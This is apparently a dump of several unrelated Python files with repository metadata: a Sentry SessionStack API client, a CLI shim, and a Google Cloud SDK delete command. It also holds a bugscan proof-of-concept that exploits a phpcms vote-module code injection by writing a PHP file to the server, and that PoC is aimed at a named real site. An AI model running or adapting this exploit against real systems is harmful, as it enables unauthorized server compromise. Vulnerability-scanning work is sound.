| 2022-12-16T19:13:54 | 2015-12-17T09:42:42 |
Python
|
UTF-8
|
Python
| false | false | 4,683 |
py
|
import requests
from sentry.http import safe_urlopen
from sentry.utils import json
from .utils import add_query_params, get_basic_auth, remove_trailing_slashes
ACCESS_TOKEN_NAME = "Sentry"
DEFAULT_SENTRY_SOURCE = "sentry"
API_URL = "https://api.sessionstack.com"
PLAYER_URL = "https://app.sessionstack.com/player"
WEBSITES_ENDPOINT = "/v1/websites/{}"
SESSION_ENDPOINT = "/v1/websites/{}/sessions/{}"
ACCESS_TOKENS_ENDPOINT = "/v1/websites/{}/sessions/{}/access_tokens"
SESSION_URL_PATH = "/#/sessions/"
MILLISECONDS_BEFORE_EVENT = 5000
class SessionStackClient:
    """Thin HTTP client for the SessionStack API.

    Builds player URLs for recorded sessions, managing the access token
    (named by ACCESS_TOKEN_NAME) that the player requires.
    """
    def __init__(self, account_email, api_token, website_id, **kwargs):
        self.website_id = website_id
        # Optional overrides for self-hosted installations; trailing slashes
        # are stripped so endpoint concatenation stays well-formed.
        api_url = kwargs.get("api_url") or API_URL
        self.api_url = remove_trailing_slashes(api_url)
        player_url = kwargs.get("player_url") or PLAYER_URL
        self.player_url = remove_trailing_slashes(player_url)
        self.request_headers = {
            "Authorization": get_basic_auth(account_email, api_token),
            "Content-Type": "application/json",
        }
    def validate_api_access(self):
        """Probe the websites endpoint; raise a specific error on bad config."""
        website_endpoint = WEBSITES_ENDPOINT.format(self.website_id)
        try:
            response = self._make_request(website_endpoint, "GET")
        except requests.exceptions.ConnectionError:
            raise InvalidApiUrlError
        if response.status_code == requests.codes.UNAUTHORIZED:
            raise UnauthorizedError
        elif response.status_code == requests.codes.BAD_REQUEST:
            raise InvalidWebsiteIdError
        elif response.status_code == requests.codes.NOT_FOUND:
            raise InvalidApiUrlError
        # Any other non-2xx status is unexpected; surface it as an HTTPError.
        response.raise_for_status()
    def get_session_url(self, session_id, event_timestamp):
        """Return a player URL for *session_id*, cued near *event_timestamp*."""
        player_url = self.player_url + SESSION_URL_PATH + session_id
        query_params = {}
        query_params["source"] = DEFAULT_SENTRY_SOURCE
        access_token = self._get_access_token(session_id)
        if access_token is not None:
            query_params["access_token"] = access_token
        if event_timestamp is not None:
            # Cue playback a few seconds before the event of interest;
            # timestamps appear to be milliseconds relative to session start.
            start_timestamp = self._get_session_start_timestamp(session_id)
            if start_timestamp is not None:
                pause_at = event_timestamp - start_timestamp
                play_from = pause_at - MILLISECONDS_BEFORE_EVENT
                query_params["pause_at"] = pause_at
                query_params["play_from"] = play_from
        return add_query_params(player_url, query_params)
    def _get_access_token(self, session_id):
        # Prefer creating a fresh token; fall back to an existing one
        # (creation can fail if a token with this name already exists).
        access_token = self._create_access_token(session_id)
        if not access_token:
            access_token = self._get_existing_access_token(session_id)
        return access_token
    def _get_existing_access_token(self, session_id):
        # Scan the session's tokens for the one this integration created.
        response = self._make_access_tokens_request(session_id, "GET")
        if response.status_code != requests.codes.OK:
            return None
        access_tokens = json.loads(response.content).get("data")
        for token in access_tokens:
            token_name = token.get("name")
            if token_name == ACCESS_TOKEN_NAME:
                return token.get("access_token")
        return None
    def _create_access_token(self, session_id):
        response = self._make_access_tokens_request(
            session_id=session_id, method="POST", body={"name": ACCESS_TOKEN_NAME}
        )
        if response.status_code != requests.codes.OK:
            return None
        return json.loads(response.content).get("access_token")
    def _make_access_tokens_request(self, session_id, method, **kwargs):
        access_tokens_endpoint = self._get_access_tokens_endpoint(session_id)
        return self._make_request(access_tokens_endpoint, method, **kwargs)
    def _get_access_tokens_endpoint(self, session_id):
        return ACCESS_TOKENS_ENDPOINT.format(self.website_id, session_id)
    def _get_session_start_timestamp(self, session_id):
        # Returns None implicitly on any non-OK response.
        endpoint = SESSION_ENDPOINT.format(self.website_id, session_id)
        response = self._make_request(endpoint, "GET")
        if response.status_code == requests.codes.OK:
            return json.loads(response.content).get("client_start")
    def _make_request(self, endpoint, method, **kwargs):
        # All API traffic funnels through here: auth headers + optional JSON body.
        url = self.api_url + endpoint
        request_kwargs = {"method": method, "headers": self.request_headers}
        body = kwargs.get("body")
        if body:
            request_kwargs["json"] = body
        return safe_urlopen(url, **request_kwargs)
class UnauthorizedError(Exception):
    """Raised when the SessionStack API rejects the account credentials."""
    pass
class InvalidWebsiteIdError(Exception):
    """Raised when the configured website id is not recognized by the API."""
    pass
class InvalidApiUrlError(Exception):
    """Raised when the API URL is unreachable or does not serve the API."""
    pass
|
[
"[email protected]"
] | |
3a4928e43a8d2eb7a9e58b5e4c3c04eee176b3f5
|
0798277f2706998ab80442ac931579eb47f676e5
|
/bin/metric-markdown
|
ed615b4e0809a60c37d486fe5df8f258f20d47d9
|
[
"Apache-2.0"
] |
permissive
|
isabella232/pulse-api-cli
|
49ed38b0694ab289802f69ee6df4911cf3378e3f
|
b01ca65b442eed19faac309c9d62bbc3cb2c098f
|
refs/heads/master
| 2023-03-18T00:23:15.295727 | 2016-05-13T15:44:08 | 2016-05-13T15:44:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 817 |
#!/usr/bin/env python
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import MetricMarkdown
"""
Reads the plugin.json manifest file looks up the definition and then outputs a markdown table
"""
if __name__ == "__main__":
    # Thin CLI shim: all work happens inside MetricMarkdown.execute().
    c = MetricMarkdown()
    c.execute()
|
[
"[email protected]"
] | ||
95d38eb622dd57ea6cf2bba55e5202edeb6e0e3b
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_679.py
|
798104fb95f83ba1ff04752dfd711df064cc3623
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453 | 2017-06-15T02:55:24 | 2017-06-15T02:55:24 | 94,495,007 | 6 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,954 |
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
# !/usr/bin/dev python
# -*- coding:utf-8 -*-
"""
reference:
http://www.wooyun.org/bugs/wooyun-2015-0104157
http://www.beebeeto.com/pdb/poc-2015-0086/
"""
import re
import urllib
import urllib2
import base64
import random
def get_vote_links(args):
    # Scrape the vote index page and collect all distinct subject ids.
    vul_url = args
    vote_url = '%sindex.php?m=vote' % vul_url
    code, head, res, _, _ = curl.curl(vote_url)
    ids = []
    for miter in re.finditer(r'<a href=.*?subjectid=(?P<id>\d+)', res, re.DOTALL):
        ids.append(miter.group('id'))
    if len(ids) == 0:
        return None
    return list(set(ids))
def assign(service, args):
    # Scanner plugin hook: this PoC only applies to phpcms targets.
    if service == 'phpcms':
        return True, args
    pass
def audit(args):
    # Attempt code injection through the vote "radio[]" parameter; a random
    # file name (base64-encoded in the payload) is written as proof.
    vul_url = args
    ids = get_vote_links(args)
    file_name = 'w2x5Tt_%s.php' % random.randint(1,3000)
    base64_name = base64.b64encode(file_name)
    if ids:
        for i in ids:
            exploit_url = '%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % (vul_url, i)
            payload = {'subjectid': 1,
                       'radio[]': ');fputs(fopen(base64_decode(%s),w),"vulnerable test");' % base64_name}
            post_data = urllib.urlencode(payload)
            code,head,body,_,_=curl.curl('-d "%s" %s' % (post_data, exploit_url))
            if code==200:
                # Trigger evaluation of the injected payload via the result page.
                verify_url = '%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % (vul_url, i)
                code,head,body,_,_=curl.curl(verify_url)
                if code==200:
                    # If the dropped file is reachable and contains the marker,
                    # report the target as vulnerable.
                    shell_url = '%s%s' % (vul_url, file_name)
                    code, head, res, _, _ = curl.curl(shell_url)
                    if code == 200 and 'vulnerable test' in res:
                        security_hole(vul_url)
if __name__ == "__main__":
    from dummy import *
    audit(assign('phpcms', 'http://www.jkb.com.cn/')[1])
|
[
"[email protected]"
] | |
4aff36fdb71b2bbc4fd29e2773506848f06a1fd6
|
8a7d5d67052892dd5d2a748282958f6244d963c6
|
/google-cloud-sdk/lib/surface/app/domain_mappings/delete.py
|
32842caf145b27ecec1a4e5410e7656b9643a037
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
KisleK/capstone
|
7d1d622bd5ca4cd355302778a02dc6d32ed00c88
|
fcef874f4fcef4b74ca016ca7bff92677673fded
|
refs/heads/master
| 2021-07-04T03:29:44.888340 | 2017-07-24T16:16:33 | 2017-07-24T16:16:33 | 93,699,673 | 0 | 2 | null | 2020-07-24T22:44:28 | 2017-06-08T02:34:17 |
Python
|
UTF-8
|
Python
| false | false | 1,812 |
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Surface for deleting an App Engine domain mapping."""
from googlecloudsdk.api_lib.app.api import appengine_domains_api_client as api_client
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.app import flags
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base.DeleteCommand):
    """Deletes a specified domain mapping."""
    detailed_help = {
        'DESCRIPTION':
            '{description}',
        'EXAMPLES':
            """\
          To delete an App Engine domain mapping, run:
              $ {command} '*.example.com'
          """,
    }
    @staticmethod
    def Args(parser):
        # Registers the positional DOMAIN argument on the command's parser.
        flags.DOMAIN_FLAG.AddToParser(parser)
    def Run(self, args):
        # Destructive operation: confirm with the user before proceeding.
        console_io.PromptContinue(
            prompt_string=('Deleting mapping [{0}]. This will stop your app from'
                           ' serving from this domain.'.format(args.domain)),
            cancel_on_no=True)
        # The alpha release track uses a separate API client.
        if self.ReleaseTrack() == base.ReleaseTrack.ALPHA:
            client = api_client.AppengineDomainsApiAlphaClient.GetApiClient()
        else:
            client = api_client.AppengineDomainsApiClient.GetApiClient()
        client.DeleteDomainMapping(args.domain)
        log.DeletedResource(args.domain)
|
[
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.